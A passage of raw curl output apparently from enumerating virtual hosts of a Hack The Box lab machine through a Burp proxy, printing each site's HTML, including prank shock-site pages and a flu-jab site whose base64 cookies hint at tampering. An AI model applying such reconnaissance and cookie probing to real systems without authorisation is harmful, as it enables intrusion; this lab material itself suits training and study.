  1993. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  1994. > GET / HTTP/1.1
  1995. > Host: custoomercare.megabank.htb
  1996. > User-Agent: curl/7.61.0
  1997. > Accept: */*
  1998. >
  1999. < HTTP/1.1 200 OK
  2000. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2001. < Content-Type: text/html; charset=UTF-8
  2002. < Connection: close
  2003. < Server: ClownWare Proxy
  2004. < Content-Length: 521
  2005. <
  2006. <!DOCTYPE html>
  2007. <html>
  2008.     <head>
  2009.         <title>WARNING!</title>
  2010.         <embed src="/kill-alarm.webm" volume="100" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  2011.     </head>
  2012.         <style type="text/css">
  2013.             body {
  2014.                 background-color: #A4000F;
  2015.             }
  2016.             img {
  2017.             width: 90%;
  2018.             height: auto;
  2019.         }
  2020.         </style>
  2021.     </head>
  2022.     <body>
  2023.         <center>
  2024.             <img src="/warning.png"/>
  2025.  
  2026.         </center>
  2027.     </body>
  2028. * Closing connection 0
  2029. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2030. </html>
  2031.  
  2032. flowerzrus.htb
  2033. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2034. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2035. *   Trying 127.0.0.1...
  2036. * TCP_NODELAY set
  2037. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2038. * allocate connect buffer!
  2039. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2040. > CONNECT 10.10.10.144:443 HTTP/1.1
  2041. > Host: 10.10.10.144:443
  2042. > User-Agent: curl/7.61.0
  2043. > Proxy-Connection: Keep-Alive
  2044. >
  2045. < HTTP/1.0 200 Connection established
  2046. <
  2047. * Proxy replied 200 to CONNECT request
  2048. * CONNECT phase completed!
  2049. * ALPN, offering h2
  2050. * ALPN, offering http/1.1
  2051. * successfully set certificate verify locations:
  2052. *   CAfile: none
  2053.   CApath: /etc/ssl/certs
  2054. * (304) (OUT), TLS handshake, Client hello (1):
  2055. * CONNECT phase completed!
  2056. * CONNECT phase completed!
  2057. * (304) (IN), TLS handshake, Server hello (2):
  2058. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2059. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2060. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2061. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2062. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2063. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2064. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2065. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2066. * ALPN, server did not agree to a protocol
  2067. * Server certificate:
  2068. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2069. *  start date: Jan 21 17:26:12 2014 GMT
  2070. *  expire date: Jan 21 17:26:12 2038 GMT
  2071. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2072. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2073. > GET / HTTP/1.1
  2074. > Host: flowerzrus.htb
  2075. > User-Agent: curl/7.61.0
  2076. > Accept: */*
  2077. >
  2078. < HTTP/1.1 200 OK
  2079. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2080. < Content-Type: text/html; charset=UTF-8
  2081. < Connection: close
  2082. < Server: ClownWare Proxy
  2083. < Content-Length: 3480
  2084. <
  2085. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2086. <html xmlns="http://www.w3.org/1999/xhtml">
  2087. <head>
  2088. <title>Floral Design</title>
  2089. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  2090. <link href="css/styles.css" rel="stylesheet" type="text/css" />
  2091. </head>
  2092. <body>
  2093. <div id="container">
  2094.   <div id="topLine"></div>
  2095.   <div id="logoPan"> <img src="images/logo.gif" width="192" height="92" alt="" id="logo" /> <img src="images/slogan.gif" width="297" height="46" alt="" id="slogan" /> </div>
  2096.   <div id="menuPan">
  2097.     <ul class="menu">
  2098.       <li class="btn_1"><a href="#">home page</a></li>
  2099.       <li class="line"></li>
  2100.       <li class="btn_2"><a href="#">about us</a></li>
  2101.       <li class="line"></li>
  2102.       <li class="btn_3"><a href="#">bouquets</a></li>
  2103.       <li class="line"></li>
  2104.       <li class="btn_4"><a href="#">specials</a></li>
  2105.       <li class="line"></li>
  2106.       <li class="btn_5"><a href="#">contacts</a></li>
  2107.     </ul>
  2108.   </div>
  2109.   <div id="header"> <img src="images/slogan2.gif" width="192" height="70" alt="" id="slogan2" /></div>
  2110.   <div id="content">
  2111.     <div id="leftPan">
  2112.       <div id="welcome">
  2113.         <h2></h2>
  2114.         <img src="images/img_welcome.jpg" width="172" height="56" alt="" />
  2115.         <p class="headline">Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. </p>
  2116.         <p>Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. In volutpat sodales ipsum. Sed vestibulum. Integer in ante. Sed Nunc laoreet lacinia nunc. In volutpat sodales </p>
  2117.       </div>
  2118.     </div>
  2119.     <div id="rightPan">
  2120.       <div id="featured">
  2121.         <h2></h2>
  2122.         <p class="headline">Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc.Nam eu nulla. Donec lobortis purus vel urna. Nunc laoreet lacinia nunc. In volutpat sodales ipsum. </p>
  2123.         <div class="featItem" id="i01"> <img src="images/img_prod.jpg" width="116" height="125" alt="" />
  2124.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2125.             <a href="#">Nam eu nulla. Donec</a><br />
  2126.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2127.         </div>
  2128.         <div class="featItem" id="i02"> <img src="images/img_prod-13.jpg" width="116" height="125" alt="" />
  2129.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2130.             <a href="#">Nam eu nulla. Donec</a><br />
  2131.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2132.         </div>
  2133.         <div class="featItem" id="i03"> <img src="images/img_prod-14.jpg" width="116" height="125" alt="" />
  2134.           <p><span class="headline2">Morbi volutpat leo in</span><br />
  2135.             <a href="#">Nam eu nulla. Donec</a><br />
  2136.             lobortis purus vel urna. Nunc laoreet lacinia nunc</p>
  2137.         </div>
  2138.         <div class="clear"></div>
  2139.       </div>
  2140.     </div>
  2141.     <div class="clear" id="end"></div>
  2142.   </div>
  2143. </div>
  2144. <div id="footer">
  2145.   <p><a href="#">HOME PAGE</a> | <a href="#">ABOUT US</a> | <a href="#">BOUTQUETS</a> | <a href="#">SPECIALS</a> | <a href="#">NEWS</a> | <a href="#">CONTACTS</a><br/>
  2146.     Copyright &copy; Your Company Name | Design by <a href="http://freshtemplates.com/">Website Templates</a></p>
  2147. </div>
  2148. <div align=center>This template  downloaded form <a href='http://all-free-download.com/free-website-templates/'>free website templates</a></div></body>
  2149. </html>
  2150. * Closing connection 0
  2151. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2152.  
  2153.  
  2154. chocolateriver.htb
  2155. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2156. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2157. *   Trying 127.0.0.1...
  2158. * TCP_NODELAY set
  2159. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2160. * allocate connect buffer!
  2161. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2162. > CONNECT 10.10.10.144:443 HTTP/1.1
  2163. > Host: 10.10.10.144:443
  2164. > User-Agent: curl/7.61.0
  2165. > Proxy-Connection: Keep-Alive
  2166. >
  2167. < HTTP/1.0 200 Connection established
  2168. <
  2169. * Proxy replied 200 to CONNECT request
  2170. * CONNECT phase completed!
  2171. * ALPN, offering h2
  2172. * ALPN, offering http/1.1
  2173. * successfully set certificate verify locations:
  2174. *   CAfile: none
  2175.   CApath: /etc/ssl/certs
  2176. * (304) (OUT), TLS handshake, Client hello (1):
  2177. * CONNECT phase completed!
  2178. * CONNECT phase completed!
  2179. * (304) (IN), TLS handshake, Server hello (2):
  2180. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2181. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2182. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2183. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2184. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2185. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2186. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2187. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2188. * ALPN, server did not agree to a protocol
  2189. * Server certificate:
  2190. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2191. *  start date: Jan 21 17:26:12 2014 GMT
  2192. *  expire date: Jan 21 17:26:12 2038 GMT
  2193. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2194. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2195. > GET / HTTP/1.1
  2196. > Host: chocolateriver.htb
  2197. > User-Agent: curl/7.61.0
  2198. > Accept: */*
  2199. >
  2200. < HTTP/1.1 200 OK
  2201. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2202. < Content-Type: text/html; charset=UTF-8
  2203. < Connection: close
  2204. < Server: ClownWare Proxy
  2205. < Content-Length: 491
  2206. <
  2207. <!DOCTYPE html>
  2208. <html>
  2209.     <head>
  2210.         <style type="text/css">
  2211.             body {
  2212.                 background-color: #000;
  2213.             }
  2214.             img {
  2215.             width: 100%;
  2216.             height: auto;
  2217.         }
  2218.         </style>
  2219.     </head>
  2220.     <body>
  2221.         <center>
  2222.             <video width=100% controls>
  2223.               <source src="chocoriver.mp4" type="video/mp4">
  2224.               Your browser does not support HTML5 video.
  2225.             </video>
  2226.         </center>
  2227.     </body>
  2228. * Closing connection 0
  2229. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2230. </html>
  2231.  
  2232. meetspinz.htb
  2233. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2234. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2235. *   Trying 127.0.0.1...
  2236. * TCP_NODELAY set
  2237. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2238. * allocate connect buffer!
  2239. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2240. > CONNECT 10.10.10.144:443 HTTP/1.1
  2241. > Host: 10.10.10.144:443
  2242. > User-Agent: curl/7.61.0
  2243. > Proxy-Connection: Keep-Alive
  2244. >
  2245. < HTTP/1.0 200 Connection established
  2246. <
  2247. * Proxy replied 200 to CONNECT request
  2248. * CONNECT phase completed!
  2249. * ALPN, offering h2
  2250. * ALPN, offering http/1.1
  2251. * successfully set certificate verify locations:
  2252. *   CAfile: none
  2253.   CApath: /etc/ssl/certs
  2254. * (304) (OUT), TLS handshake, Client hello (1):
  2255. * CONNECT phase completed!
  2256. * CONNECT phase completed!
  2257. * (304) (IN), TLS handshake, Server hello (2):
  2258. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2259. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2260. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2261. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2262. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2263. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2264. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2265. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2266. * ALPN, server did not agree to a protocol
  2267. * Server certificate:
  2268. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2269. *  start date: Jan 21 17:26:12 2014 GMT
  2270. *  expire date: Jan 21 17:26:12 2038 GMT
  2271. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2272. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2273. > GET / HTTP/1.1
  2274. > Host: meetspinz.htb
  2275. > User-Agent: curl/7.61.0
  2276. > Accept: */*
  2277. >
  2278. < HTTP/1.1 200 OK
  2279. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2280. < Content-Type: text/html; charset=UTF-8
  2281. < Connection: close
  2282. < Server: ClownWare Proxy
  2283. < Content-Length: 522
  2284. <
  2285. <!DOCTYPE html>
  2286. <html>
  2287.     <head>
  2288.         <title>Spin The Meats!</title>
  2289.         <embed src="/bonus.webm" volume="100" height="0" width="0" autostart="true" loop="true"  width="0" height="0">
  2290.     </head>
  2291.         <style type="text/css">
  2292.             body {
  2293.                 background-color: #000;
  2294.             }
  2295.             img {
  2296.             width: 100%;
  2297.             height: auto;
  2298.         }
  2299.         </style>
  2300.     </head>
  2301.     <body>
  2302.         <center>
  2303.             <img src="/meatspin.gif"/>
  2304.  
  2305.         </center>
  2306.     </body>
  2307. * Closing connection 0
  2308. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2309. </html>
  2310.  
  2311. rubberlove.htb
  2312. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2313. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2314. *   Trying 127.0.0.1...
  2315. * TCP_NODELAY set
  2316. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2317. * allocate connect buffer!
  2318. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2319. > CONNECT 10.10.10.144:443 HTTP/1.1
  2320. > Host: 10.10.10.144:443
  2321. > User-Agent: curl/7.61.0
  2322. > Proxy-Connection: Keep-Alive
  2323. >
  2324. < HTTP/1.0 200 Connection established
  2325. <
  2326. * Proxy replied 200 to CONNECT request
  2327. * CONNECT phase completed!
  2328. * ALPN, offering h2
  2329. * ALPN, offering http/1.1
  2330. * successfully set certificate verify locations:
  2331. *   CAfile: none
  2332.   CApath: /etc/ssl/certs
  2333. * (304) (OUT), TLS handshake, Client hello (1):
  2334. * CONNECT phase completed!
  2335. * CONNECT phase completed!
  2336. * (304) (IN), TLS handshake, Server hello (2):
  2337. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2338. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2339. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2340. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2341. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2342. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2343. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2344. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2345. * ALPN, server did not agree to a protocol
  2346. * Server certificate:
  2347. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2348. *  start date: Jan 21 17:26:12 2014 GMT
  2349. *  expire date: Jan 21 17:26:12 2038 GMT
  2350. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2351. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2352. > GET / HTTP/1.1
  2353. > Host: rubberlove.htb
  2354. > User-Agent: curl/7.61.0
  2355. > Accept: */*
  2356. >
  2357. < HTTP/1.1 200 OK
  2358. < Date: Thu, 20 Dec 2018 00:41:11 GMT
  2359. < Content-Type: text/html; charset=UTF-8
  2360. < Connection: close
  2361. < Server: ClownWare Proxy
  2362. < Content-Length: 492
  2363. <
  2364. <!DOCTYPE html>
  2365. <html>
  2366.     <head>
  2367.         <style type="text/css">
  2368.             body {
  2369.                 background-color: #000;
  2370.             }
  2371.             img {
  2372.             width: 100%;
  2373.             height: auto;
  2374.         }
  2375.         </style>
  2376.     </head>
  2377.     <body>
  2378.         <center>
  2379.             <video width=60% controls>
  2380.               <source src="rubberlove.webm" type="video/webm">
  2381.               Your browser does not support HTML5 video.
  2382.             </video>
  2383.         </center>
  2384.     </body>
  2385. * Closing connection 0
  2386. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2387. </html>
  2388.  
  2389. freeflujab.htb
  2390. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2391. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2392. *   Trying 127.0.0.1...
  2393. * TCP_NODELAY set
  2394. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2395. * allocate connect buffer!
  2396. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2397. > CONNECT 10.10.10.144:443 HTTP/1.1
  2398. > Host: 10.10.10.144:443
  2399. > User-Agent: curl/7.61.0
  2400. > Proxy-Connection: Keep-Alive
  2401. >
  2402. < HTTP/1.0 200 Connection established
  2403. <
  2404. * Proxy replied 200 to CONNECT request
  2405. * CONNECT phase completed!
  2406. * ALPN, offering h2
  2407. * ALPN, offering http/1.1
  2408. * successfully set certificate verify locations:
  2409. *   CAfile: none
  2410.   CApath: /etc/ssl/certs
  2411. * (304) (OUT), TLS handshake, Client hello (1):
  2412. * CONNECT phase completed!
  2413. * CONNECT phase completed!
  2414. * (304) (IN), TLS handshake, Server hello (2):
  2415. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2416. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2417. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2418. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2419. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2420. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2421. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2422. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2423. * ALPN, server did not agree to a protocol
  2424. * Server certificate:
  2425. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2426. *  start date: Jan 21 17:26:12 2014 GMT
  2427. *  expire date: Jan 21 17:26:12 2038 GMT
  2428. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2429. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2430. > GET / HTTP/1.1
  2431. > Host: freeflujab.htb
  2432. > User-Agent: curl/7.61.0
  2433. > Accept: */*
  2434. >
  2435. < HTTP/1.1 200 OK
  2436. < Date: Thu, 20 Dec 2018 00:41:12 GMT
  2437. < Content-Type: text/html; charset=UTF-8
  2438. < Connection: close
  2439. < Set-Cookie: Modus=Q29uZmlndXJlPU51bGw%3D; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/?smtp_config
  2440. < Set-Cookie: Patient=4f6c00295ca97dc7357d7384584a92f4; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/
  2441. < Set-Cookie: Registered=NGY2YzAwMjk1Y2E5N2RjNzM1N2Q3Mzg0NTg0YTkyZjQ9TnVsbA%3D%3D; expires=Thu, 20-Dec-2018 01:41:12 GMT; Max-Age=3600; path=/
  2442. < Server: ClownWare Proxy
  2443. < Content-Length: 8867
  2444. <
  2445. <!DOCTYPE HTML>
  2446. <html>
  2447.     <head>
  2448.         <title>Vaccinations</title>
  2449.         <meta charset="utf-8" />
  2450.         <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"/>
  2451.         <link rel="stylesheet" href="assets/css/main.css"/>
  2452.     </head>
  2453.     <body class="homepage is-preload">
  2454.         <div id="page-wrapper">
  2455.  
  2456.             <!-- Header -->
  2457.                 <section id="header" class="wrapper style3">
  2458.  
  2459.                     <!-- Logo -->
  2460.                         <div id="logo">
  2461.                             <h1><a href="/?stats">Winter Is Coming...</a></h1>
  2462.                         </br>
  2463.                             <h1>Book Your Free NHS Flu Jab Today!</h1>
  2464.                         </div>
  2465.  
  2466.                     <!-- Nav -->
  2467.                         <nav id="nav">
  2468.                             <ul>
  2469.                                 <li class="current"><a href="?home">Home</a></li>
  2470.                                 <li>
  2471.                                     <a href="#">Patients</a>
  2472.                                     <ul>
  2473.                                         <li><a href="?reg">Register</a></li>
  2474.                                         <li><a href="?book">Booking</a></li>
  2475.                                         <li><a href="?cancel">Cancelation</a></li>
  2476.                                         <li><a href="?remind">Reminder</a></li>
  2477.                                         </li>
  2478.                                     </ul>
  2479.                                 </li>
  2480.                                 <li><a href="/?info">Vaccine Info</a></li>
  2481.                                 <li><a href="/?stats">Flu Stats</a></li>
  2482.                             </ul>
  2483.                         </nav>
  2484.  
  2485.                 </section><!-- Scripts -->
  2486.     <script src="assets/js/jquery.min.js"></script>
  2487.     <script src="assets/js/jquery.dropotron.min.js"></script>
  2488.     <script src="assets/js/browser.min.js"></script>
  2489.     <script src="assets/js/breakpoints.min.js"></script>
  2490.     <script src="assets/js/util.js"></script>
  2491.     <script src="assets/js/main.js"></script><!-- Main -->
  2492.                 <section id="main" class="wrapper style1">
  2493.                     <div class="title">Vaccinations</div>
  2494.                     <div class="container">
  2495.                         <!-- <div class="row gtr-150"> -->
  2496.                             <div class="col-8 col-12-medium">
  2497.  
  2498.                                 <!-- Content -->
  2499.                                     <div id="content">
  2500.                                         <article class="box post">
  2501.                                             <header class="style1">
  2502.                                                 <h2>Getting The Flu Jab</h2>
  2503.                                                 <h3>Flu vaccination is available every year on the NHS to help protect adults and children at risk of flu and its complications.</h3>
  2504.                                             </header>
  2505.                                             <a href="?book" class="image featured">
  2506.                                                 <img src="images/pic01.jpg" alt="" />
  2507.                                             </a>
  2508.                                             <h2>The flu vaccine</h2>
  2509.                                             <p>Flu can be unpleasant, but if you are otherwise healthy it will usually clear up on its own within a week.
  2510.  
  2511.                                             However, flu can be more severe in certain people, such as:
  2512.                                             <ul>
  2513.                                                 <li>anyone aged 65 and over</li>
  2514.                                                 <li>pregnant women</li>
  2515.                                                 <li>children and adults with an underlying health condition (such as long-term heart or respiratory disease)</li>
  2516.                                                 <li>children and adults with weakened immune systems</li>
  2517.                                             </ul>
  2518.                                             Anyone in these risk groups is more likely to develop potentially serious complications of flu, such as pneumonia (a lung infection), so it is now recommended that they have a flu vaccine every year to help protect them.</p>
  2519.                                             <h2>Who should get the flu vaccine?</h2>
  2520.                                             <p>The flu vaccine is routinely given on the NHS to:
  2521.                                             <ul>
  2522.                                                 <li>adults 65 and over</li>
  2523.                                                 <li>people with certain medical conditions (including children in at-risk groups from 6 months of age)</li>
  2524.                                                 <li>pregnant women</li>
  2525.                                                 <li>children aged 2 and 3</li>
  2526.                                                 <li>children in reception class and school years 1, 2, 3, 4 and 5</li>
  2527.                                             </ul>
  2528.                                         <h3>For 2018, there are 3 types of flu vaccine:</h3>
  2529.                                             <p>1. a live quadrivalent vaccine (which protects against 4 strains of flu), given as a nasal spray. This is for children and young people aged 2 to 17 years eligible for the flu vaccine</p>
  2530.                                             <p>2. a quadrivalent injected vaccine. This is for adults aged 18 and over but below the age of 65 who are at increased risk from flu because of a long-term health condition and for children 6 months and above in an eligible group who cannot receive the live vaccine</p>
  2531.                                             <p>3. an adjuvanted trivalent injected vaccine. This is for people aged 65 and over as it has been shown to be more effective in this age group</p>
  2532.                                         </article>
  2533.                                         <div class="row gtr-150">
  2534.                                             <div class="col-6 col-12-small">
  2535.                                                 <section class="box">
  2536.                                                     <header>
  2537.                                                         <h2>Young Children</h2>
  2538.                                                     </header>
  2539.                                                     <a href="#" class="image featured"><img src="images/pic05.jpg" alt="" /></a>
  2540.                                                     <p>If your child is aged between 6 months and 2 years old and is in a high-risk group for flu, they will be offered an injected flu vaccine as the nasal spray is not licensed for children under 2.</p>
  2541.                                                     <a href="/?info" class="button style1">More</a>
  2542.                                                 </section>
  2543.                                             </div>
  2544.                                             <div class="col-6 col-12-small">
  2545.                                                 <section class="box">
  2546.                                                     <header>
  2547.                                                         <h2>How effective is the flu vaccine?</h2>
  2548.                                                     </header>
  2549.                                                     <a href="#" class="image featured"><img src="images/pic06.jpg" alt="" /></a>
  2550.                                                     <p>Flu vaccine is the best protection we have against an unpredictable virus that can cause unpleasant illness in children and severe illness and death among at-risk groups, including older people, pregnant women and those with an underlying medical health condition.</p>
  2551.                                                     <a href="/?stats" class="button style1">More</a>
  2552.                                                 </section>
  2553.                                             </div>
  2554.                                         </div>
  2555.                                     </div>
  2556.  
  2557.                             </div>
  2558.                         </div>
  2559.                     </div>
  2560.                 </section>
  2561.       </section>
  2562.       <!-- Footer -->
  2563.         <section id="footer" class="wrapper">
  2564.           <div class="container">
  2565.             <div id="copyright">
  2566.               <ul>
  2567.                 <li>&copy; 3mrgnc3</li>
  2568.                 <li> <a href="http://freeflujab.htb">FreeFluJab.htb</a></li>
  2569.                 <li><b><a href="https://clownware.htb/link.php">Protected By ClownWare.htb</a></b></li>
  2570.               </ul>
  2571.             </div>  
  2572.         </section>
  2573.     </div>
  2574.   </body>
  2575. </html>
  2576.  
  2577. <!--
  2578. We're all sorry for the other guy when he loses his job to a machine.
  2579. But when it comes to your job -- that's different.  And it always will
  2580. be different.
  2581.         -- McCoy, "The Ultimate Computer", stardate 4729.4
  2582.  
  2583. -->
  2584.  
  2585. * Closing connection 0
  2586. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  2587.  
  2588.  
  2589. flujab.htb
  2590. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  2591. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  2592. *   Trying 127.0.0.1...
  2593. * TCP_NODELAY set
  2594. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  2595. * allocate connect buffer!
  2596. * Establish HTTP proxy tunnel to 10.10.10.144:443
  2597. > CONNECT 10.10.10.144:443 HTTP/1.1
  2598. > Host: 10.10.10.144:443
  2599. > User-Agent: curl/7.61.0
  2600. > Proxy-Connection: Keep-Alive
  2601. >
  2602. < HTTP/1.0 200 Connection established
  2603. <
  2604. * Proxy replied 200 to CONNECT request
  2605. * CONNECT phase completed!
  2606. * ALPN, offering h2
  2607. * ALPN, offering http/1.1
  2608. * successfully set certificate verify locations:
  2609. *   CAfile: none
  2610.   CApath: /etc/ssl/certs
  2611. * (304) (OUT), TLS handshake, Client hello (1):
  2612. * CONNECT phase completed!
  2613. * CONNECT phase completed!
  2614. * (304) (IN), TLS handshake, Server hello (2):
  2615. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  2616. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  2617. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  2618. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  2619. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  2620. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  2621. * TLSv1.2 (IN), TLS handshake, Finished (20):
  2622. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  2623. * ALPN, server did not agree to a protocol
  2624. * Server certificate:
  2625. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  2626. *  start date: Jan 21 17:26:12 2014 GMT
  2627. *  expire date: Jan 21 17:26:12 2038 GMT
  2628. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  2629. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  2630. > GET / HTTP/1.1
  2631. > Host: flujab.htb
  2632. > User-Agent: curl/7.61.0
  2633. > Accept: */*
  2634. >
  2635. < HTTP/1.1 200 OK
  2636. < Date: Thu, 20 Dec 2018 00:41:12 GMT
  2637. < Content-Type: text/html; charset=UTF-8
  2638. < Connection: close
  2639. < Server: ClownWare Proxy
  2640. < Content-Length: 3475
  2641. <
  2642. <!DOCTYPE html>
  2643. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  2644. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  2645. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  2646. <!--[if gt IE 8]><!-->
  2647. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  2648. <title>Direct IP access not allowed | ClownWare</title>
  2649. <meta charset="UTF-8">
  2650. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  2651. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  2652. <meta name="robots" content="noindex, nofollow">
  2653. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  2654. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  2655. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  2656. <style type="text/css">body{margin:0;padding:0}</style>
  2657.  
  2658.  
  2659. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
